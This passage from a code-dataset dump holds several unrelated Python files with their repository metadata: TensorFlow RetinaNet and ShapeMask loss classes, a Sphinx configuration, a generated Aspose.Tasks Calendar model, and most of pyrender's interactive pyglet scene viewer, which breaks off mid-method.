ignore_label), tf.zeros_like(cls_targets, dtype=tf.float32), tf.ones_like(cls_targets, dtype=tf.float32), ) ignore_loss = tf.expand_dims(ignore_loss, -1) ignore_loss = tf.tile(ignore_loss, [1, 1, 1, 1, self._num_classes]) ignore_loss = tf.reshape(ignore_loss, tf.shape(input=loss)) return tf.reduce_sum(input_tensor=ignore_loss * loss) class RetinanetBoxLoss(object): """RetinaNet box loss.""" def __init__(self, params): self._huber_loss = tf.keras.losses.Huber( delta=params.huber_loss_delta, reduction=tf.keras.losses.Reduction.SUM) def __call__(self, box_outputs, labels, num_positives): """Computes box detection loss. Computes total detection loss including box and class loss from all levels. Args: box_outputs: an OrderDict with keys representing levels and values representing box regression targets in [batch_size, height, width, num_anchors * 4]. labels: the dictionary that returned from dataloader that includes box groundturth targets. num_positives: number of positive examples in the minibatch. Returns: an integar tensor representing total box regression loss. """ # Sums all positives in a batch for normalization and avoids zero # num_positives_sum, which would lead to inf loss during training num_positives_sum = tf.reduce_sum(input_tensor=num_positives) + 1.0 box_losses = [] for level in box_outputs.keys(): # Onehot encoding for classification labels. box_targets_l = labels[level] box_losses.append( self.box_loss(box_outputs[level], box_targets_l, num_positives_sum)) # Sums per level losses to total loss. return tf.add_n(box_losses) def box_loss(self, box_outputs, box_targets, num_positives): """Computes RetinaNet box regression loss.""" # The delta is typically around the mean value of regression target. # for instances, the regression targets of 512x512 input with 6 anchors on # P3-P7 pyramid is about [0.1, 0.1, 0.2, 0.2]. normalizer = num_positives * 4.0 mask = tf.cast(tf.not_equal(box_targets, 0.0), dtype=tf.float32) box_targets = tf.expand_dims(box_targets, axis=-1) box_outputs = tf.expand_dims(box_outputs, axis=-1) box_loss = self._huber_loss(box_targets, box_outputs, sample_weight=mask) box_loss /= normalizer return box_loss class ShapemaskMseLoss(object): """ShapeMask mask Mean Squared Error loss function wrapper.""" def __call__(self, probs, labels, valid_mask): """Compute instance segmentation loss. Args: probs: A Tensor of shape [batch_size * num_points, height, width, num_classes]. The logits are not necessarily between 0 and 1. labels: A float32/float16 Tensor of shape [batch_size, num_instances, mask_size, mask_size], where mask_size = mask_crop_size * gt_upsample_scale for fine mask, or mask_crop_size for coarse masks and shape priors. valid_mask: a binary mask indicating valid training masks. Returns: loss: an float tensor representing total mask classification loss. """ with tf.name_scope('shapemask_prior_loss'): batch_size, num_instances = valid_mask.get_shape().as_list()[:2] diff = (tf.cast(labels, dtype=tf.float32) - tf.cast(probs, dtype=tf.float32)) diff *= tf.cast( tf.reshape(valid_mask, [batch_size, num_instances, 1, 1]), tf.float32) # Adding 0.001 in the denominator to avoid division by zero. loss = tf.nn.l2_loss(diff) / (tf.reduce_sum(labels) + 0.001) return loss class ShapemaskLoss(object): """ShapeMask mask loss function wrapper.""" def __init__(self): self._binary_crossentropy = tf.keras.losses.BinaryCrossentropy( reduction=tf.keras.losses.Reduction.SUM, from_logits=True) def __call__(self, logits, labels, valid_mask): """ShapeMask mask cross entropy loss function wrapper. Args: logits: A Tensor of shape [batch_size * num_instances, height, width, num_classes]. The logits are not necessarily between 0 and 1. labels: A float16/float32 Tensor of shape [batch_size, num_instances, mask_size, mask_size], where mask_size = mask_crop_size * gt_upsample_scale for fine mask, or mask_crop_size for coarse masks and shape priors. valid_mask: a binary mask of shape [batch_size, num_instances] indicating valid training masks. Returns: loss: an float tensor representing total mask classification loss. """ with tf.name_scope('shapemask_loss'): batch_size, num_instances = valid_mask.get_shape().as_list()[:2] labels = tf.cast(labels, tf.float32) logits = tf.cast(logits, tf.float32) loss = self._binary_crossentropy(labels, logits) loss *= tf.cast(tf.reshape( valid_mask, [batch_size, num_instances, 1, 1]), loss.dtype) # Adding 0.001 in the denominator to avoid division by zero. loss = tf.reduce_sum(loss) / (tf.reduce_sum(labels) + 0.001) return loss
42.545287
186
0.682626
4bf0c1266dd79e0aa7dad9942a18418f53c42b40
2,427
py
Python
docs/source/conf.py
rchui/laminar
63bcc813484bd8510bcfa93456e46118b7093b5e
[ "MIT" ]
null
null
null
docs/source/conf.py
rchui/laminar
63bcc813484bd8510bcfa93456e46118b7093b5e
[ "MIT" ]
1
2022-02-04T00:50:26.000Z
2022-02-04T00:50:26.000Z
docs/source/conf.py
rchui/laminar
83e03aa97a11943218fc792b0f33017200cb10be
[ "MIT" ]
null
null
null
import os import sys from typing import Any # Configuration file for the Sphinx documentation builder. # # This file only contains a selection of the most common options. For a full # list see the documentation: # https://www.sphinx-doc.org/en/master/usage/configuration.html # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath("../..")) # -- Project information ----------------------------------------------------- project = "laminar" copyright = "2021, Ryan Chui" author = "Ryan Chui <ryan.w.chui@gmail.com>" # -- General configuration --------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ "myst_parser", "sphinx.ext.autodoc", "sphinx.ext.autosectionlabel", "sphinx.ext.autosummary", "sphinx.ext.githubpages", "sphinx.ext.napoleon", ] autosummary_generate = True # Make and include autosummary files # Add any paths that contain templates here, relative to this directory. templates_path = ["_templates"] # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This pattern also affects html_static_path and html_extra_path. # exclude_patterns = [] # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = "sphinx_rtd_theme" # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". # html_static_path = ["_static"] # -- Special members --------------------------------------------------------- def skip(app: Any, what: Any, name: str, obj: Any, would_skip: bool, options: Any) -> bool: if name == "__init__": return False return would_skip def setup(app: Any) -> None: app.connect("autodoc-skip-member", skip)
32.36
91
0.646889
2552f3e9b067632eb8aa7f91192f1ecce678d4e7
8,809
py
Python
asposetaskscloud/models/calendar.py
aspose-tasks-cloud/aspose-tasks-cloud-python
d1852a02fb1aa2591501a34d5e56079f8aac43f0
[ "MIT" ]
2
2021-08-16T09:25:51.000Z
2022-01-27T20:20:41.000Z
asposetaskscloud/models/calendar.py
aspose-tasks-cloud/aspose-tasks-cloud-python
d1852a02fb1aa2591501a34d5e56079f8aac43f0
[ "MIT" ]
null
null
null
asposetaskscloud/models/calendar.py
aspose-tasks-cloud/aspose-tasks-cloud-python
d1852a02fb1aa2591501a34d5e56079f8aac43f0
[ "MIT" ]
null
null
null
# coding: utf-8 # ----------------------------------------------------------------------------------- # <copyright company="Aspose" file="Calendar.py"> # Copyright (c) 2020 Aspose.Tasks Cloud # </copyright> # <summary> # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # </summary> # ----------------------------------------------------------------------------------- import pprint import re # noqa: F401 import six class Calendar(object): """Represents a calendar used in a project. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'name': 'str', 'uid': 'int', 'days': 'list[WeekDay]', 'is_base_calendar': 'bool', 'base_calendar': 'Calendar', 'is_baseline_calendar': 'bool' } attribute_map = { 'name': 'name', 'uid': 'uid', 'days': 'days', 'is_base_calendar': 'isBaseCalendar', 'base_calendar': 'baseCalendar', 'is_baseline_calendar': 'isBaselineCalendar' } def __init__(self, name=None, uid=None, days=None, is_base_calendar=None, base_calendar=None, is_baseline_calendar=None): # noqa: E501 """Calendar - a model defined in Swagger""" # noqa: E501 self._name = None self._uid = None self._days = None self._is_base_calendar = None self._base_calendar = None self._is_baseline_calendar = None self.discriminator = None if name is not None: self.name = name if uid is not None: self.uid = uid if days is not None: self.days = days if is_base_calendar is not None: self.is_base_calendar = is_base_calendar if base_calendar is not None: self.base_calendar = base_calendar if is_baseline_calendar is not None: self.is_baseline_calendar = is_baseline_calendar @property def name(self): """Gets the name of this Calendar. # noqa: E501 The name of the calendar. # noqa: E501 :return: The name of this Calendar. # noqa: E501 :rtype: str """ return self._name @name.setter def name(self, name): """Sets the name of this Calendar. The name of the calendar. # noqa: E501 :param name: The name of this Calendar. # noqa: E501 :type: str """ self._name = name @property def uid(self): """Gets the uid of this Calendar. # noqa: E501 The unique identifier of the calendar. # noqa: E501 :return: The uid of this Calendar. # noqa: E501 :rtype: int """ return self._uid @uid.setter def uid(self, uid): """Sets the uid of this Calendar. The unique identifier of the calendar. # noqa: E501 :param uid: The uid of this Calendar. # noqa: E501 :type: int """ if uid is None: raise ValueError("Invalid value for `uid`, must not be `None`") # noqa: E501 self._uid = uid @property def days(self): """Gets the days of this Calendar. # noqa: E501 The collection of weekdays that defines the calendar. # noqa: E501 :return: The days of this Calendar. # noqa: E501 :rtype: list[WeekDay] """ return self._days @days.setter def days(self, days): """Sets the days of this Calendar. The collection of weekdays that defines the calendar. # noqa: E501 :param days: The days of this Calendar. # noqa: E501 :type: list[WeekDay] """ self._days = days @property def is_base_calendar(self): """Gets the is_base_calendar of this Calendar. # noqa: E501 Determines whether the calendar is a base calendar. # noqa: E501 :return: The is_base_calendar of this Calendar. # noqa: E501 :rtype: bool """ return self._is_base_calendar @is_base_calendar.setter def is_base_calendar(self, is_base_calendar): """Sets the is_base_calendar of this Calendar. Determines whether the calendar is a base calendar. # noqa: E501 :param is_base_calendar: The is_base_calendar of this Calendar. # noqa: E501 :type: bool """ if is_base_calendar is None: raise ValueError("Invalid value for `is_base_calendar`, must not be `None`") # noqa: E501 self._is_base_calendar = is_base_calendar @property def base_calendar(self): """Gets the base_calendar of this Calendar. # noqa: E501 The base calendar on which this calendar depends. Only applicable if the calendar is not a base calendar. # noqa: E501 :return: The base_calendar of this Calendar. # noqa: E501 :rtype: Calendar """ return self._base_calendar @base_calendar.setter def base_calendar(self, base_calendar): """Sets the base_calendar of this Calendar. The base calendar on which this calendar depends. Only applicable if the calendar is not a base calendar. # noqa: E501 :param base_calendar: The base_calendar of this Calendar. # noqa: E501 :type: Calendar """ self._base_calendar = base_calendar @property def is_baseline_calendar(self): """Gets the is_baseline_calendar of this Calendar. # noqa: E501 Specifies whether the calendar is a baseline calendar. # noqa: E501 :return: The is_baseline_calendar of this Calendar. # noqa: E501 :rtype: bool """ return self._is_baseline_calendar @is_baseline_calendar.setter def is_baseline_calendar(self, is_baseline_calendar): """Sets the is_baseline_calendar of this Calendar. Specifies whether the calendar is a baseline calendar. # noqa: E501 :param is_baseline_calendar: The is_baseline_calendar of this Calendar. # noqa: E501 :type: bool """ if is_baseline_calendar is None: raise ValueError("Invalid value for `is_baseline_calendar`, must not be `None`") # noqa: E501 self._is_baseline_calendar = is_baseline_calendar def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, Calendar): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
34.011583
139
0.601884
23170666ae6bf19e7e069a252d786a7db1dcfcb4
43,131
py
Python
pyrender/viewer.py
monsieurgustav/pyrender
10ada1d4f895a4e9272299347def675ec4ba4407
[ "MIT" ]
53
2020-03-29T04:15:44.000Z
2022-03-19T02:49:12.000Z
pyrender/viewer.py
monsieurgustav/pyrender
10ada1d4f895a4e9272299347def675ec4ba4407
[ "MIT" ]
3
2020-07-13T12:54:58.000Z
2020-11-18T15:50:04.000Z
pyrender/viewer.py
monsieurgustav/pyrender
10ada1d4f895a4e9272299347def675ec4ba4407
[ "MIT" ]
7
2020-06-16T14:42:48.000Z
2021-04-13T04:34:52.000Z
"""A pyglet-based interactive 3D scene viewer. """ import copy import os import sys from threading import Thread, RLock import time import imageio import numpy as np import OpenGL import trimesh try: from Tkinter import Tk, tkFileDialog as filedialog except Exception: try: from tkinter import Tk, filedialog as filedialog except Exception: pass from .constants import (OPEN_GL_MAJOR, OPEN_GL_MINOR, TEXT_PADDING, DEFAULT_SCENE_SCALE, DEFAULT_Z_FAR, DEFAULT_Z_NEAR, RenderFlags, TextAlign) from .light import DirectionalLight from .node import Node from .camera import PerspectiveCamera, OrthographicCamera, IntrinsicsCamera from .trackball import Trackball from .renderer import Renderer from .mesh import Mesh import pyglet from pyglet import clock pyglet.options['shadow_window'] = False class Viewer(pyglet.window.Window): """An interactive viewer for 3D scenes. The viewer's camera is separate from the scene's, but will take on the parameters of the scene's main view camera and start in the same pose. If the scene does not have a camera, a suitable default will be provided. Parameters ---------- scene : :class:`Scene` The scene to visualize. viewport_size : (2,) int The width and height of the initial viewing window. render_flags : dict A set of flags for rendering the scene. Described in the note below. viewer_flags : dict A set of flags for controlling the viewer's behavior. Described in the note below. registered_keys : dict A map from ASCII key characters to tuples containing: - A function to be called whenever the key is pressed, whose first argument will be the viewer itself. - (Optionally) A list of additional positional arguments to be passed to the function. - (Optionally) A dict of keyword arguments to be passed to the function. kwargs : dict Any keyword arguments left over will be interpreted as belonging to either the :attr:`.Viewer.render_flags` or :attr:`.Viewer.viewer_flags` dictionaries. Those flag sets will be updated appropriately. Note ---- The basic commands for moving about the scene are given as follows: - **Rotating about the scene**: Hold the left mouse button and drag the cursor. - **Rotating about the view axis**: Hold ``CTRL`` and the left mouse button and drag the cursor. - **Panning**: - Hold SHIFT, then hold the left mouse button and drag the cursor, or - Hold the middle mouse button and drag the cursor. - **Zooming**: - Scroll the mouse wheel, or - Hold the right mouse button and drag the cursor. Other keyboard commands are as follows: - ``a``: Toggles rotational animation mode. - ``c``: Toggles backface culling. - ``f``: Toggles fullscreen mode. - ``h``: Toggles shadow rendering. - ``i``: Toggles axis display mode (no axes, world axis, mesh axes, all axes). - ``l``: Toggles lighting mode (scene lighting, Raymond lighting, or direct lighting). - ``m``: Toggles face normal visualization. - ``n``: Toggles vertex normal visualization. - ``o``: Toggles orthographic mode. - ``q``: Quits the viewer. - ``r``: Starts recording a GIF, and pressing again stops recording and opens a file dialog. - ``s``: Opens a file dialog to save the current view as an image. - ``w``: Toggles wireframe mode (scene default, flip wireframes, all wireframe, or all solid). - ``z``: Resets the camera to the initial view. Note ---- The valid keys for ``render_flags`` are as follows: - ``flip_wireframe``: `bool`, If `True`, all objects will have their wireframe modes flipped from what their material indicates. Defaults to `False`. - ``all_wireframe``: `bool`, If `True`, all objects will be rendered in wireframe mode. Defaults to `False`. - ``all_solid``: `bool`, If `True`, all objects will be rendered in solid mode. Defaults to `False`. - ``shadows``: `bool`, If `True`, shadows will be rendered. Defaults to `False`. - ``vertex_normals``: `bool`, If `True`, vertex normals will be rendered as blue lines. Defaults to `False`. - ``face_normals``: `bool`, If `True`, face normals will be rendered as blue lines. Defaults to `False`. - ``cull_faces``: `bool`, If `True`, backfaces will be culled. Defaults to `True`. - ``point_size`` : float, The point size in pixels. Defaults to 1px. Note ---- The valid keys for ``viewer_flags`` are as follows: - ``rotate``: `bool`, If `True`, the scene's camera will rotate about an axis. Defaults to `False`. - ``rotate_rate``: `float`, The rate of rotation in radians per second. Defaults to `PI / 3.0`. - ``rotate_axis``: `(3,) float`, The axis in world coordinates to rotate about. Defaults to ``[0,0,1]``. - ``view_center``: `(3,) float`, The position to rotate the scene about. Defaults to the scene's centroid. - ``use_raymond_lighting``: `bool`, If `True`, an additional set of three directional lights that move with the camera will be added to the scene. Defaults to `False`. - ``use_direct_lighting``: `bool`, If `True`, an additional directional light that moves with the camera and points out of it will be added to the scene. Defaults to `False`. - ``lighting_intensity``: `float`, The overall intensity of the viewer's additional lights (when they're in use). Defaults to 3.0. - ``use_perspective_cam``: `bool`, If `True`, a perspective camera will be used. Otherwise, an orthographic camera is used. Defaults to `True`. - ``save_directory``: `str`, A directory to open the file dialogs in. Defaults to `None`. - ``window_title``: `str`, A title for the viewer's application window. Defaults to `"Scene Viewer"`. - ``refresh_rate``: `float`, A refresh rate for rendering, in Hertz. Defaults to `30.0`. - ``fullscreen``: `bool`, Whether to make viewer fullscreen. Defaults to `False`. - ``show_world_axis``: `bool`, Whether to show the world axis. Defaults to `False`. - ``show_mesh_axes``: `bool`, Whether to show the individual mesh axes. Defaults to `False`. - ``caption``: `list of dict`, Text caption(s) to display on the viewer. Defaults to `None`. Note ---- Animation can be accomplished by running the viewer with ``run_in_thread`` enabled. Then, just run a loop in your main thread, updating the scene as needed. Before updating the scene, be sure to acquire the :attr:`.Viewer.render_lock`, and release it when your update is done. """ def __init__(self, scene, viewport_size=None, render_flags=None, viewer_flags=None, registered_keys=None, run_in_thread=False, **kwargs): ####################################################################### # Save attributes and flags ####################################################################### if viewport_size is None: viewport_size = (640, 480) self._scene = scene self._viewport_size = viewport_size self._render_lock = RLock() self._is_active = False self._should_close = False self._run_in_thread = run_in_thread self._default_render_flags = { 'flip_wireframe': False, 'all_wireframe': False, 'all_solid': False, 'shadows': False, 'vertex_normals': False, 'face_normals': False, 'cull_faces': True, 'point_size': 1.0, } self._default_viewer_flags = { 'mouse_pressed': False, 'rotate': False, 'rotate_rate': np.pi / 3.0, 'rotate_axis': np.array([0.0, 0.0, 1.0]), 'view_center': None, 'record': False, 'use_raymond_lighting': False, 'use_direct_lighting': False, 'lighting_intensity': 3.0, 'use_perspective_cam': True, 'save_directory': None, 'window_title': 'Scene Viewer', 'refresh_rate': 30.0, 'fullscreen': False, 'show_world_axis': False, 'show_mesh_axes': False, 'caption': None } self._render_flags = self._default_render_flags.copy() self._viewer_flags = self._default_viewer_flags.copy() self._viewer_flags['rotate_axis'] = ( self._default_viewer_flags['rotate_axis'].copy() ) if render_flags is not None: self._render_flags.update(render_flags) if viewer_flags is not None: self._viewer_flags.update(viewer_flags) for key in kwargs: if key in self.render_flags: self._render_flags[key] = kwargs[key] elif key in self.viewer_flags: self._viewer_flags[key] = kwargs[key] # TODO MAC OS BUG FOR SHADOWS if sys.platform == 'darwin': self._render_flags['shadows'] = False self._registered_keys = {} if registered_keys is not None: self._registered_keys = { ord(k.lower()): registered_keys[k] for k in registered_keys } ####################################################################### # Save internal settings ####################################################################### # Set up caption stuff self._message_text = None self._ticks_till_fade = 2.0 / 3.0 * self.viewer_flags['refresh_rate'] self._message_opac = 1.0 + self._ticks_till_fade # Set up raymond lights and direct lights self._raymond_lights = self._create_raymond_lights() self._direct_light = self._create_direct_light() # Set up axes self._axes = {} self._axis_mesh = Mesh.from_trimesh( trimesh.creation.axis(origin_size=0.1, axis_radius=0.05, axis_length=1.0), smooth=False) if self.viewer_flags['show_world_axis']: self._set_axes(world=self.viewer_flags['show_world_axis'], mesh=self.viewer_flags['show_mesh_axes']) ####################################################################### # Set up camera node ####################################################################### self._camera_node = None self._prior_main_camera_node = None self._default_camera_pose = None self._default_persp_cam = None self._default_orth_cam = None self._trackball = None self._saved_frames = [] # Extract main camera from scene and set up our mirrored copy znear = None zfar = None if scene.main_camera_node is not None: n = scene.main_camera_node camera = copy.copy(n.camera) if isinstance(camera, (PerspectiveCamera, IntrinsicsCamera)): self._default_persp_cam = camera znear = camera.znear zfar = camera.zfar elif isinstance(camera, OrthographicCamera): self._default_orth_cam = camera znear = camera.znear zfar = camera.zfar self._default_camera_pose = scene.get_pose(scene.main_camera_node) self._prior_main_camera_node = n # Set defaults as needed if zfar is None: zfar = max(scene.scale * 10.0, DEFAULT_Z_FAR) if znear is None or znear == 0: if scene.scale == 0: znear = DEFAULT_Z_NEAR else: znear = min(scene.scale / 10.0, DEFAULT_Z_NEAR) if self._default_persp_cam is None: self._default_persp_cam = PerspectiveCamera( yfov=np.pi / 3.0, znear=znear, zfar=zfar ) if self._default_orth_cam is None: xmag = ymag = scene.scale if scene.scale == 0: xmag = ymag = 1.0 self._default_orth_cam = OrthographicCamera( xmag=xmag, ymag=ymag, znear=znear, zfar=zfar ) if self._default_camera_pose is None: self._default_camera_pose = self._compute_initial_camera_pose() # Pick camera if self.viewer_flags['use_perspective_cam']: camera = self._default_persp_cam else: camera = self._default_orth_cam self._camera_node = Node( matrix=self._default_camera_pose, camera=camera ) scene.add_node(self._camera_node) scene.main_camera_node = self._camera_node self._reset_view() ####################################################################### # Initialize OpenGL context and renderer ####################################################################### self._renderer = Renderer( self._viewport_size[0], self._viewport_size[1], self.render_flags['point_size'] ) self._is_active = True if self.run_in_thread: self._thread = Thread(target=self._init_and_start_app) self._thread.start() else: self._init_and_start_app() @property def scene(self): """:class:`.Scene` : The scene being visualized. """ return self._scene @property def viewport_size(self): """(2,) int : The width and height of the viewing window. """ return self._viewport_size @property def render_lock(self): """:class:`threading.RLock` : If acquired, prevents the viewer from rendering until released. Run :meth:`.Viewer.render_lock.acquire` before making updates to the scene in a different thread, and run :meth:`.Viewer.render_lock.release` once you're done to let the viewer continue. """ return self._render_lock @property def is_active(self): """bool : `True` if the viewer is active, or `False` if it has been closed. """ return self._is_active @property def run_in_thread(self): """bool : Whether the viewer was run in a separate thread. """ return self._run_in_thread @property def render_flags(self): """dict : Flags for controlling the renderer's behavior. - ``flip_wireframe``: `bool`, If `True`, all objects will have their wireframe modes flipped from what their material indicates. Defaults to `False`. - ``all_wireframe``: `bool`, If `True`, all objects will be rendered in wireframe mode. Defaults to `False`. - ``all_solid``: `bool`, If `True`, all objects will be rendered in solid mode. Defaults to `False`. - ``shadows``: `bool`, If `True`, shadows will be rendered. Defaults to `False`. - ``vertex_normals``: `bool`, If `True`, vertex normals will be rendered as blue lines. Defaults to `False`. - ``face_normals``: `bool`, If `True`, face normals will be rendered as blue lines. Defaults to `False`. - ``cull_faces``: `bool`, If `True`, backfaces will be culled. Defaults to `True`. - ``point_size`` : float, The point size in pixels. Defaults to 1px. """ return self._render_flags @render_flags.setter def render_flags(self, value): self._render_flags = value @property def viewer_flags(self): """dict : Flags for controlling the viewer's behavior. The valid keys for ``viewer_flags`` are as follows: - ``rotate``: `bool`, If `True`, the scene's camera will rotate about an axis. Defaults to `False`. - ``rotate_rate``: `float`, The rate of rotation in radians per second. Defaults to `PI / 3.0`. - ``rotate_axis``: `(3,) float`, The axis in world coordinates to rotate about. Defaults to ``[0,0,1]``. - ``view_center``: `(3,) float`, The position to rotate the scene about. Defaults to the scene's centroid. - ``use_raymond_lighting``: `bool`, If `True`, an additional set of three directional lights that move with the camera will be added to the scene. Defaults to `False`. - ``use_direct_lighting``: `bool`, If `True`, an additional directional light that moves with the camera and points out of it will be added to the scene. Defaults to `False`. - ``lighting_intensity``: `float`, The overall intensity of the viewer's additional lights (when they're in use). Defaults to 3.0. - ``use_perspective_cam``: `bool`, If `True`, a perspective camera will be used. Otherwise, an orthographic camera is used. Defaults to `True`. - ``save_directory``: `str`, A directory to open the file dialogs in. Defaults to `None`. - ``window_title``: `str`, A title for the viewer's application window. Defaults to `"Scene Viewer"`. - ``refresh_rate``: `float`, A refresh rate for rendering, in Hertz. Defaults to `30.0`. - ``fullscreen``: `bool`, Whether to make viewer fullscreen. Defaults to `False`. - ``show_world_axis``: `bool`, Whether to show the world axis. Defaults to `False`. - ``show_mesh_axes``: `bool`, Whether to show the individual mesh axes. Defaults to `False`. - ``caption``: `list of dict`, Text caption(s) to display on the viewer. Defaults to `None`. """ return self._viewer_flags @viewer_flags.setter def viewer_flags(self, value): self._viewer_flags = value @property def registered_keys(self): """dict : Map from ASCII key character to a handler function. This is a map from ASCII key characters to tuples containing: - A function to be called whenever the key is pressed, whose first argument will be the viewer itself. - (Optionally) A list of additional positional arguments to be passed to the function. - (Optionally) A dict of keyword arguments to be passed to the function. """ return self._registered_keys @registered_keys.setter def registered_keys(self, value): self._registered_keys = value def close_external(self): """Close the viewer from another thread. This function will wait for the actual close, so you immediately manipulate the scene afterwards. """ self._should_close = True while self.is_active: time.sleep(1.0 / self.viewer_flags['refresh_rate']) def save_gif(self, filename=None): """Save the stored GIF frames to a file. To use this asynchronously, run the viewer with the ``record`` flag and the ``run_in_thread`` flags set. Kill the viewer after your desired time with :meth:`.Viewer.close_external`, and then call :meth:`.Viewer.save_gif`. Parameters ---------- filename : str The file to save the GIF to. If not specified, a file dialog will be opened to ask the user where to save the GIF file. """ if filename is None: filename = self._get_save_filename(['gif', 'all']) if filename is not None: self.viewer_flags['save_directory'] = os.path.dirname(filename) imageio.mimwrite(filename, self._saved_frames, fps=self.viewer_flags['refresh_rate'], palettesize=128, subrectangles=True) self._saved_frames = [] def on_close(self): """Exit the event loop when the window is closed. """ # Remove our camera and restore the prior one if self._camera_node is not None: self.scene.remove_node(self._camera_node) if self._prior_main_camera_node is not None: self.scene.main_camera_node = self._prior_main_camera_node # Delete any lighting nodes that we've attached if self.viewer_flags['use_raymond_lighting']: for n in self._raymond_lights: if self.scene.has_node(n): self.scene.remove_node(n) if self.viewer_flags['use_direct_lighting']: if self.scene.has_node(self._direct_light): self.scene.remove_node(self._direct_light) # Delete any axis nodes that we've attached self._remove_axes() # Delete renderer if self._renderer is not None: self._renderer.delete() self._renderer = None # Force clean-up of OpenGL context data try: OpenGL.contextdata.cleanupContext() self.close() except Exception: pass finally: self._is_active = False super(Viewer, self).on_close() pyglet.app.exit() def on_draw(self): """Redraw the scene into the viewing window. """ if self._renderer is None: return if self.run_in_thread: self.render_lock.acquire() # Make OpenGL context current self.switch_to() # Render the scene self.clear() self._render() if self._message_text is not None: self._renderer.render_text( self._message_text, self.viewport_size[0] - TEXT_PADDING, TEXT_PADDING, font_pt=20, color=np.array([0.1, 0.7, 0.2, np.clip(self._message_opac, 0.0, 1.0)]), align=TextAlign.BOTTOM_RIGHT ) if self.viewer_flags['caption'] is not None: for caption in self.viewer_flags['caption']: xpos, ypos = self._location_to_x_y(caption['location']) self._renderer.render_text( caption['text'], xpos, ypos, font_name=caption['font_name'], font_pt=caption['font_pt'], color=caption['color'], scale=caption['scale'], align=caption['location'] ) if self.run_in_thread: self.render_lock.release() def on_resize(self, width, height): """Resize the camera and trackball when the window is resized. """ if self._renderer is None: return self._viewport_size = (width, height) self._trackball.resize(self._viewport_size) self._renderer.viewport_width = self._viewport_size[0] self._renderer.viewport_height = self._viewport_size[1] self.on_draw() def on_mouse_press(self, x, y, buttons, modifiers): """Record an initial mouse press. """ self._trackball.set_state(Trackball.STATE_ROTATE) if (buttons == pyglet.window.mouse.LEFT): ctrl = (modifiers & pyglet.window.key.MOD_CTRL) shift = (modifiers & pyglet.window.key.MOD_SHIFT) if (ctrl and shift): self._trackball.set_state(Trackball.STATE_ZOOM) elif ctrl: self._trackball.set_state(Trackball.STATE_ROLL) elif shift: self._trackball.set_state(Trackball.STATE_PAN) elif (buttons == pyglet.window.mouse.MIDDLE): self._trackball.set_state(Trackball.STATE_PAN) elif (buttons == pyglet.window.mouse.RIGHT): self._trackball.set_state(Trackball.STATE_ZOOM) self._trackball.down(np.array([x, y])) # Stop animating while using the mouse self.viewer_flags['mouse_pressed'] = True def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers): """Record a mouse drag. """ self._trackball.drag(np.array([x, y])) def on_mouse_release(self, x, y, button, modifiers): """Record a mouse release. """ self.viewer_flags['mouse_pressed'] = False def on_mouse_scroll(self, x, y, dx, dy): """Record a mouse scroll. """ if self.viewer_flags['use_perspective_cam']: self._trackball.scroll(dy) else: spfc = 0.95 spbc = 1.0 / 0.95 sf = 1.0 if dy > 0: sf = spfc * dy elif dy < 0: sf = - spbc * dy c = self._camera_node.camera xmag = max(c.xmag * sf, 1e-8) ymag = max(c.ymag * sf, 1e-8 * c.ymag / c.xmag) c.xmag = xmag c.ymag = ymag def on_key_press(self, symbol, modifiers): """Record a key press. """ # First, check for registered key callbacks if symbol in self.registered_keys: tup = self.registered_keys[symbol] callback = None args = [] kwargs = {} if not isinstance(tup, (list, tuple, np.ndarray)): callback = tup else: callback = tup[0] if len(tup) == 2: args = tup[1] if len(tup) == 3: kwargs = tup[2] callback(self, *args, **kwargs) return # Otherwise, use default key functions # A causes the frame to rotate self._message_text = None if symbol == pyglet.window.key.A: self.viewer_flags['rotate'] = not self.viewer_flags['rotate'] if self.viewer_flags['rotate']: self._message_text = 'Rotation On' else: self._message_text = 'Rotation Off' # C toggles backface culling elif symbol == pyglet.window.key.C: self.render_flags['cull_faces'] = ( not self.render_flags['cull_faces'] ) if self.render_flags['cull_faces']: self._message_text = 'Cull Faces On' else: self._message_text = 'Cull Faces Off' # F toggles face normals elif symbol == pyglet.window.key.F: self.viewer_flags['fullscreen'] = ( not self.viewer_flags['fullscreen'] ) self.set_fullscreen(self.viewer_flags['fullscreen']) self.activate() if 